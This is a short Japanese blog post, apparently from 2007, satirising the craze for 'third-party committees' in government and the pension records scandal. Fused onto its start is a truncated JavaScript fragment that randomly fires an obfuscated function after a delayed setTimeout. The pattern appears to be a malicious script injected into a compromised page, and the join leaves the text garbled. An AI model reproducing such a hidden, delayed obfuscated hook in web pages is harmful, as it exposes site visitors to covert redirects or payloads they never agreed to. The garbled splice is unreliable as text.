andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ton200707大流行! 第三者委員会

近頃政府や市町村その他アチコチで「第3者委員会」をつくるのが大流行。当事者に能力が無いのか、当事者が信用できないと思われているか、当事者が火の粉を被る危険をさけるためなのか?理由はハッキリしないが何かが起こるとつくられる。 出来た時は気になるが、何時消えたか覚えてない青春時代のニキビに似たようなものらしい。 ニキビにあう薬は、名前を変えて次々出てくるが効果は無い場合が多い。結局は自らの体内からから治すの方が良いとかいう。
「年金問題」でも、 払った被保険  者と受取った社 会保険庁(国家) が当事者なのに、事情を知らない第三者に判断を仰ぐとは。人生幸路でないが「責任者出て来い」と怒鳴りたい。